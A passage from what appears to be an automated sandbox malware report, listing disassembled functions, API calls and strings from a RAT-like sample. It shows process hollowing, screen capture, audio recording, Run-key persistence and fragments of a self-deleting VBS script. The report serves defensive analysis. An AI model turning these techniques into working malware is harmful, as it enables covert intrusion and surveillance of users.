                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 1663032902-0
                                                                                                        • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                        • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                        • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                        • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                        Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2692324296-0
                                                                                                        • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                        • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                        • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                        • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                        Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                        • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1272433827-0
                                                                                                        • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                        • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                        • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                        • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                        Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                        • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1084509184-0
                                                                                                        • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                        • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                        • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                        • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                        Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                        • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                        • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Function 0044E92E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: HeapProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 54951025-0
                                                                                                        • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                        • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                        • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                        • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                        Function 00417F9F Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                          • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                        • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                        • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                        • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                        • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                        • DeleteObject.GDI32(?), ref: 00418107
                                                                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                        • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                        • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                        • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                        • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                        • DeleteDC.GDI32(?), ref: 00418398
                                                                                                        • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                        • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                        • String ID: DISPLAY
                                                                                                        • API String ID: 1765752176-865373369
                                                                                                        • Opcode ID: 54e54478d3a93c6a48e505b633be5783707cf85144324253bebfee7b4c7dea2f
                                                                                                        • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                        • Opcode Fuzzy Hash: 54e54478d3a93c6a48e505b633be5783707cf85144324253bebfee7b4c7dea2f
                                                                                                        • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                        Function 00417245 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 290libraryloaderthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                        • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                        • GetLastError.KERNEL32 ref: 004175C7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                        • API String ID: 4188446516-3035715614
                                                                                                        • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                        • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                        • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                        • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                                        Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                        • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                        • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                        • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                          • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                          • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                          • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                          • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                        • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                        • API String ID: 4250697656-2665858469
                                                                                                        • Opcode ID: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                        • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                        • Opcode Fuzzy Hash: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                        • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                        Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                          • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                          • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                        • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                        • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                        • API String ID: 1861856835-3168347843
                                                                                                        • Opcode ID: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                                        • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                                                                        • Opcode Fuzzy Hash: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                                        • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                                                                        Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                          • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                          • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                        • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                        • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                        • API String ID: 3797177996-1998216422
                                                                                                        • Opcode ID: f8db6c80a5998e80f5fcda658f3bc18fad5a3966bea32a5fb824f2fdbbebcd5a
                                                                                                        • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                        • Opcode Fuzzy Hash: f8db6c80a5998e80f5fcda658f3bc18fad5a3966bea32a5fb824f2fdbbebcd5a
                                                                                                        • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                                        Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                        • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                        • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                        • API String ID: 738084811-1408154895
                                                                                                        • Opcode ID: 488289ec40dba372481858aeedb64a88910d805c9ae5a4b7c21143b04d603b6e
                                                                                                        • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                        • Opcode Fuzzy Hash: 488289ec40dba372481858aeedb64a88910d805c9ae5a4b7c21143b04d603b6e
                                                                                                        • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                        Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                        • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                        • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
